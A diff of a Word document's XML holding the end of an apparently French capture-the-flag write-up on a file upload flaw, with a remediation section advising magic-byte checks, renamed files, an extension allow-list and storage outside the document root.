+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Et le flag apparait dans le résultat de la commande :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23DBEC27" wp14:editId="0433827C">
+            <wp:extent cx="5760720" cy="333375"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="903127089" name="Image 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="903127089" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId62"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="333375"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="double" w:sz="6" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="92D050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Une application ne doit jamais faire </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">confiance à </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">une </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve">en-tête </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>« </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t>Content-Type</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t> »</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> fourni par l'utilisateur.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Pour cela il convient de :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Utilis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>er</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> des Magic Bytes :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Vérifier la signature binaire du fichier. En PHP,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>utilise</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> l'extension </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="FFFFFF" w:themeColor="background1"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>finfo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Renommer les fichier</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>avec un identifiant unique</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>image_15928374.jpg</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> au lieu de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>empty</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> et n’autoriser QUE des .jpg, .jpeg, .png</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Stockage</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> des fichiers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hors du </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>ocument Root</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId60"/>
+      <w:footerReference w:type="default" r:id="rId63"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
